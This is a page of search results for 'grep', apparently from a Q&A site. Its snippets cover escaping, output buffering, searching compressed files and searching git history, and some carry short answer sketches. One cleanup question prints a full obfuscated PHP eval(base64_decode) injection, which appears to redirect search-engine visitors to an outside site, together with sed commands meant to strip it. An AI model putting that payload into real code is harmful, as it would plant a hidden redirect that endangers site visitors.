Search Results

Search found 2253 results on 91 pages for 'grep'.

Page 2 of 91

  • Best grep-like tool

    - by e-satis
    I do in-file searches a lot, and I used to love grep. Then I learned of the existence of egrep, so I switched to benefit from the advanced regexps. Then I discovered the Eclipse search tool, which is much easier to use than grep. Then I found ack: fast, easy, powerful. And now I use grin, which is smooth for Pythonistas. I know there are also a couple of tools of this kind with a GUI. So what tool do you use, and why do you think it's the best? Practical features generally are: fast to fire up and use; speedy processing; automatically ignores useless files; colored output; outputs lines, filename, context; allows complex regexps; allows custom filtering and output; GUI + command-line integration; lets you open an editor from the result set. There are some related posts on SO: http://stackoverflow.com/questions/87350/what-are-good-grep-tool-for-windows http://stackoverflow.com/questions/981601/colorized-grep-viewing-the-entire-file-with-highlighting http://stackoverflow.com/questions/1028107/is-there-some-unix-util-that-will-allow-me-to-grep-multiple-files-with-little-type http://stackoverflow.com/questions/1027906/unix-find-grep-syntax-vs-awk

    Read the article

  • grep on Windows XP vs. Windows 7

    - by cschol
    I am using grep from GnuWin32 on Windows. On Windows XP, the following command

      grep -e "foo" NUL

    results in the following output:

      grep: NUL: invalid argument

    On Windows 7, the same arguments result in no output at all. Why is the output different between Windows XP and Windows 7?

    Read the article

  • Searching for literal "> \" using ack-grep

    - by Stephen Gornick
    I am looking for lines that literally have a greater-than character (a ">") followed by a space followed by a backslash character (a "\"), i.e., a line with this in it: > \

    I thought escaping would allow this, and for the greater-than it does:

      $ ack-grep "> "

    returns lines that have "> " in them. But when I try to escape the backslash as well I get:

      $ ack-grep "> \"
      ack-grep: Invalid regex '> \': Trailing \ in regex m/> \/

    Read the article
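
    A hedged sketch for the question above: ack's -Q (--literal) option treats the pattern as a fixed string, which sidesteps the escaping problem entirely; otherwise the backslash has to be doubled inside the regex, with single quotes keeping the shell from eating it first.

      # literal match, no regex interpretation at all
      ack-grep -Q '> \' .

      # or escape the backslash in the regex itself
      ack-grep '> \\' .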

  • strange behaviour of grep in UNIX

    - by Happy Mittal
    When I type a command

      $ grep \\\\h junk

    then the shell should interpret \\\\h as \\h (the two pairs of \\ become one \ each), and grep in turn should interpret \\h as \h (the \\ becomes \), so grep should search for the pattern \h in junk, which it does successfully. But the same reasoning is not working for \\\\$. Please explain why?

    Read the article
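
    A hedged sketch for the question above, showing one way to see exactly what the shell hands to grep before grep ever interprets it (printf and set -x are used purely for inspection; junk is the asker's file):

      printf '%s\n' \\\\h     # prints \\h  -> grep receives the regex \\h: a literal \ followed by h
      printf '%s\n' \\\\$     # prints \\$  -> grep receives \\$: a literal \ followed by a trailing $,
                              #    which in a basic regexp still acts as the end-of-line anchor
      # tracing the real command:
      set -x
      grep \\\\$ junk
      set +x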

  • Grepping grep output fails

    - by viraptor
    I'm trying to grep the output of ngrep. Unfortunately, when I add another grep to the pipeline, I get no output at all. It can be some other command too - cat / grep / tee - everything breaks the chain. Example:

      # this works:
      $ ngrep -l -q -T -Wbyline -d any udp and port 5060 | egrep -B1 '^SIP/2.0 180'
      --
      U +1.469535 xxx:5060 -> xxx:5060
      SIP/2.0 180 Ringing.
      --
      U +0.001384 xxx:5060 -> xxx:2048
      SIP/2.0 180 Ringing.

      # but these don't:
      $ ngrep -l -q -T -Wbyline -d any udp and port 5060 | egrep -B1 '^SIP/2.0 180' | egrep '^U'
      $ ngrep -l -q -T -Wbyline -d any udp and port 5060 | egrep -B1 '^SIP/2.0 180' | cat
      $ ngrep -l -q -T -Wbyline -d any udp and port 5060 | egrep -B1 '^SIP/2.0 180' | tee test

    If I use cat somefile instead of ngrep at the start, everything works as expected. Any ideas what could go wrong here?

    Read the article
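
    A hedged guess at a sketch for the question above: when egrep writes to a pipe rather than a terminal it block-buffers, so with a slow live stream like ngrep's the matches can sit unseen in the buffer. GNU grep's --line-buffered flag (or stdbuf -oL from coreutils) forces line buffering:

      ngrep -l -q -T -Wbyline -d any udp and port 5060 \
        | egrep --line-buffered -B1 '^SIP/2.0 180' \
        | egrep '^U'

      # the same idea using stdbuf:
      ngrep -l -q -T -Wbyline -d any udp and port 5060 \
        | stdbuf -oL egrep -B1 '^SIP/2.0 180' \
        | egrep '^U'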

  • Recovering text files in terminal using grep on Mac OS X Snow Leopard

    - by littlejim84
    I foolishly removed some source code from my Mac OS X Snow Leopard machine with rm -rf when doing something with buildout. I want to try to recover these files. I haven't touched the system since, so that I could seek an answer first. I found this article and it seems like the grep method is the way to go, but when running it on my machine I get 'Resource busy' when trying to run it on the disk. I'm using this command:

      sudo grep -a -B1000 -A1000 'video_output' /dev/disk0s2 > file.txt

    where /dev/disk0s2 is what came up when I ran df. I get this when running it:

      grep: /dev/disk0s2: Resource busy

    I'm not an expert with this stuff, I'm trying my best. Please can anyone help me further? I'm on the verge of losing two days of source code work! Thank you

    Read the article
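
    A hedged note and sketch for the question above: the block device of a mounted volume (especially the boot volume) is typically reported as busy, so a common workaround is to read the raw device node instead, or to search the disk while it is not mounted (booted from another volume or over target disk mode). Redirecting the recovered text onto the same disk also risks overwriting the very blocks being recovered, so an external destination is safer. The raw-device path and the /Volumes/External destination below are assumptions based on the asker's /dev/disk0s2:

      sudo grep -a -B1000 -A1000 'video_output' /dev/rdisk0s2 > /Volumes/External/file.txt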

  • grep, xargs, sed to clean up PHP eval hack

    - by roktechie
    I'm attempting to use the commands found on http://devilsworkshop.org/tutorial/remove-evalbase64decode-malicious-code-grep-sed-commands-files-linux-server/55587/ to clean up a PHP eval-based hack on a site. Sample code to match/remove:

      <?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokcWF6cGxtPWhlYWRlcnNfc2VudCgpOwppZiAoISRxYXpwbG0pewokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwppZiAoJHVhZykgewppZiAoIXN0cmlzdHIoJHVhZywiTVNJRSA3LjAiKSBhbmQgIXN0cmlzdHIoJHVhZywiTVNJRSA2LjAiKSl7CmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbS9sIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9sb29wZG93bi5sZmxpbmt1cC5jb20vIik7CmV4aXQoKTsKfQp9Cn0KfQp9"));

    Attempted command:

      sudo grep -lr --include=*.php "eval(base64_decode" /home/user/webdir | sudo xargs sed -i.bak 's/<?php eval(base64_decode[^;]*;/<?php\n/g'

    The sudo has been added because it is required to have permission to read/write the dir I'm accessing. The files list properly from grep, but they are not changed by sed. Any suggestions?

    Read the article
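
    A hedged sketch for the question above: before editing in place it is worth previewing what sed would actually change, and NUL-delimited file names (grep -lZ with xargs -0) avoid surprises with spaces in paths. The directory and pattern are the asker's own:

      # preview: print only the lines sed would rewrite, change nothing
      sudo grep -lrZ --include='*.php' 'eval(base64_decode' /home/user/webdir \
        | sudo xargs -0 sed -n 's/<?php eval(base64_decode[^;]*;/<?php /p'

      # if the preview looks right, run the in-place version with backups
      sudo grep -lrZ --include='*.php' 'eval(base64_decode' /home/user/webdir \
        | sudo xargs -0 sed -i.bak 's/<?php eval(base64_decode[^;]*;/<?php /'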

  • Grep all files in a directory and print matches with file name

    - by javanix
    I have a list of log files that I create as part of a video encoding script that I wrote. I would like to search all of them and print out certain statistics from the encode - how fast they were encoded, what settings were used, etc. I can search for the average framerate in one file via this one-liner:

      cat ${filename} | grep average

    which outputs:

      work: average encoding speed for job is 23.211176 fps

    and search for the ratefactor:

      cat ${filename} | grep RF

    I would like to search all files in the directory and print off one, or preferably both, pieces of information along with the filename. Is there any way I can use find or grep to get this in a one-liner, or do I need to write a script? I would like output like this:

      /home/javanix/filename.log
      <RF line>
      <average line>

    I would like this to work on either FreeBSD 9 or Ubuntu 12.04.

    Read the article
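
    A hedged one-liner sketch for the question above (the directory and the .log extension are assumptions):

      # -H prints the file name in front of every match; -e adds a second pattern
      grep -H -e 'average' -e 'RF' /home/javanix/*.log

      # or, recursively via find:
      find /home/javanix -name '*.log' -exec grep -H -e 'average' -e 'RF' {} +

    This prints filename:line pairs rather than the exact three-line layout asked for, but it carries the same information.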

  • grep with after-context that does not contain a keyword

    - by ukasz
    I want to grep through logs and gather a certain exception stacktrace, but I only want to see those that do not contain certain keywords in the --after-context. I do not know in which line of the after-context the keyword is. Simple example - given this shell code:

      grep -A 2 A <<EOF
      A
      B
      C
      R
      A
      Z
      Z
      X
      EOF

    the output is:

      A
      B
      C
      --
      A
      Z
      Z

    I'd like the output to be:

      A
      Z
      Z

    I want to exclude any match that has 'B' in its after-context. How do I do this? Using grep is not a requirement, though I only have access to coreutils and perl.

    Read the article
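
    A hedged perl sketch for the question above (perl and coreutils are what the asker has). It assumes GNU grep's "--" separator delimits each match-plus-context group, and that "B" stands in for the unwanted keyword; input.txt is a placeholder for the real log:

      grep -A 2 A input.txt \
        | perl -0777 -ne 'print grep { !/^B/m } split /^--\n/m'

    Each group that contains a line starting with B is dropped; the remaining groups are printed unchanged.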

  • linux grep question

    - by lepricon123
    How do I find a string in the files in a directory whose names begin with the letter a? I also want to get the number of occurrences of this string from the grep I run. I tried this:

      cat * | grep -c string

    but it searches all files. I just want to search files that begin with the letter a. Thanks

    Read the article
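
    A hedged sketch for the question above: letting the shell glob pick the files avoids the cat altogether. Note that -c counts matching lines per file, not total occurrences; -o plus wc -l counts every occurrence:

      grep -c 'string' a*            # matching lines, reported per file
      grep -o 'string' a* | wc -l    # total number of occurrences across the files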

  • grep - what arguments do you usually specify?

    - by meder
    My most common grep line is just:

      grep -IRl "text" *

    However I'm kinda getting tired of retyping this over and over - is there some way I can make an alias so that those arguments are always enabled? And I was wondering what arguments you usually specify for text searching - my three arguments ('R' for recursion, 'I' for skipping binary files like jpg/gif, and 'l' for listing only the names of matching files) seem a bit too minimal. Which arguments do you use?

    Read the article
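
    A hedged sketch for the question above (the alias name is made up; it would go in ~/.bashrc or ~/.zshrc):

      # always recurse, skip binaries, list only matching file names
      alias g='grep -IRl'

      # usage:
      g "text" *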

  • Grep-ing gzipped files [duplicate]

    - by Julien Genestoux
    This question already has an answer here: Grepping through .gz log files. I have a set of 100 log files, compressed using gzip. I need to find all lines matching a given expression. I'd use grep, but of course that's a bit of a nightmare, because I'd have to unzip all the files one by one, grep them, and delete the unzipped versions, since they wouldn't all fit on my server if they were all unzipped. Does anyone have a little trick for getting this done quickly?

    Read the article
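
    A hedged sketch for the question above: zgrep (shipped with gzip) greps compressed files without unpacking them to disk, and zcat streams them through an ordinary grep:

      zgrep -H 'expression' *.gz       # -H keeps the file name in front of each match
      zcat *.gz | grep 'expression'    # loses the file names but avoids unpacking too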

  • grepping a substring from a grep result

    - by allentown
    Given a log file, I will usually do something like this:

      grep 'marker-1234' filter_log

    What is the difference between using '', "", or nothing around the pattern? The above grep command will yield many thousands of lines, which is what I desire. Within those lines, there is usually one chunk of data I am after. Sometimes I use awk to print out the fields I am after, but in this case the log format changes, so I can't rely on position exclusively; not to mention, the actual logged data can push positions forward. To make this understandable, let's say the log line contained an IP address, and that was all I was after, so I could later pipe it to sort and uniq and get some tally counts. An example may be:

      2010-04-08 some logged data, indeterminate chars - [marker-1234] (123.123.123.123) from: [email protected] to [email protected] [stat-xyz9876]

    The first grep command will give me many thousands of lines like the above; from there, I want to pipe it to something, probably sed, which can pull out a pattern within and print only the pattern. For this example, using the IP address would suffice. I tried; is sed not able to understand [0-9]{1,3}. as a pattern? I had to use [0-9][0-9][0-9]. which yielded strange results until the entire pattern was created. This is not specific to an IP address; the pattern will change, but I can use this as a learning template. Thank you all.

    Read the article
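
    A hedged sketch for the question above: grep's -o flag prints only the matched text, and -E turns on extended regexps so the {1,3} interval works; plain sed needs either -E (or -r) or the escaped \{1,3\} form for the same syntax:

      grep 'marker-1234' filter_log | grep -Eo '[0-9]{1,3}(\.[0-9]{1,3}){3}' | sort | uniq -c

      # the sed equivalent (capture the address between the parentheses):
      grep 'marker-1234' filter_log | sed -En 's/.*\(([0-9]{1,3}(\.[0-9]{1,3}){3})\).*/\1/p'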

  • Regex to find external links from the html file using grep

    - by Amar
    Hello, for the past few days I've been trying to develop a regex that fetches all the external links from the web pages given to it, using grep. Here is my grep command:

      grep -h -o -e "\(\(mailto:\|\(\(ht\|f\)tp\(s\?\)\)\)\://\)\{1\}\(.*\?\)" "/mnt/websites_folder/folder_to_search" -r

    Now grep seems to return everything after the external links on a given line. For example, if an HTML file contains something like this on the same line:

      <a href="http://www.google.com">Google</a><p><a href='https://yahoo.com'>Yahoo</a></p>

    then the given grep command returns the following result:

      http://www.google.com">Google</a><p><a href='https://yahoo.com'>Yahoo</a></p>

    The idea here is that if an HTML file contains more than one link (irrespective of whether it is in a, img, etc.) on the same line, then the regex should fetch only the links and not all the content of that line. I managed to develop the same in rubular.com; the regex is as follows:

      ("|')(\b((ht|f)tps?:\/\/)(.*?)\b)("|')

    which works with the above input, but I am not able to replicate the same in grep. Can anyone help? I can't modify the HTML files, so don't ask me to do that; neither can I look for each specific tag and check its attributes to get external links, as that adds processing time and my application doesn't demand it. Thank You

    Read the article
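
    A hedged sketch for the question above: the lazy (.*?) from the rubular regex only works in Perl-compatible mode (GNU grep's -P, when built with PCRE support), but a negated character class that stops each match at the first quote, angle bracket, or space does the same job in plain extended-regexp mode, and -o then prints only the URL:

      grep -rhoE "(mailto:|(ht|f)tps?://)[^\"'<> ]+" /mnt/websites_folder/folder_to_search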

  • Match exactly (and only) the pattern I specify in a grep command

    - by palswim
    Usually, grep searches for all lines containing a match for the pattern/parameter I specify. I would like to match just the pattern (i.e. not the whole line). So, if a file contains the lines:

      We said that we'll come.
      Unfortunately, we were delayed.
      Now, we're on our way.

    I want to find all contractions starting with "we" (regex pattern: we\'[a-z]+/i). And I'm looking for the output:

      we'll
      we're

    How do I do this (with grep or another Unix/Windows command-line tool)?

    Read the article
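
    A hedged sketch for the question above: grep's -o flag prints only the part of each line that matched, and -i makes it case-insensitive (-E is used so the + quantifier needs no escaping; file.txt stands in for the real file):

      grep -oiE "we'[a-z]+" file.txt
      # we'll
      # we're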

  • How to grep in the git history?

    - by Ortwin Gentz
    I have deleted a file, or some code in a file, sometime in the past. Can I grep in the content (not in the commit messages)? A very poor solution is to grep the log:

      git log -p | grep <pattern>

    However, this doesn't return the commit hash straight away. I played around with "git grep" to no avail.

    Read the article
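
    A hedged sketch for the question above: git's pickaxe options search the content of diffs and report the commits that added or removed the text (the search strings and path below are placeholders):

      git log -S 'some_deleted_code' --oneline      # commits where the number of occurrences changed
      git log -G 'some_regex' --oneline             # commits whose diff matches the regex
      git log --all --full-history -- path/to/deleted_file   # history of a deleted file

      # searching the content of every blob ever committed:
      git grep 'some_deleted_code' $(git rev-list --all)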
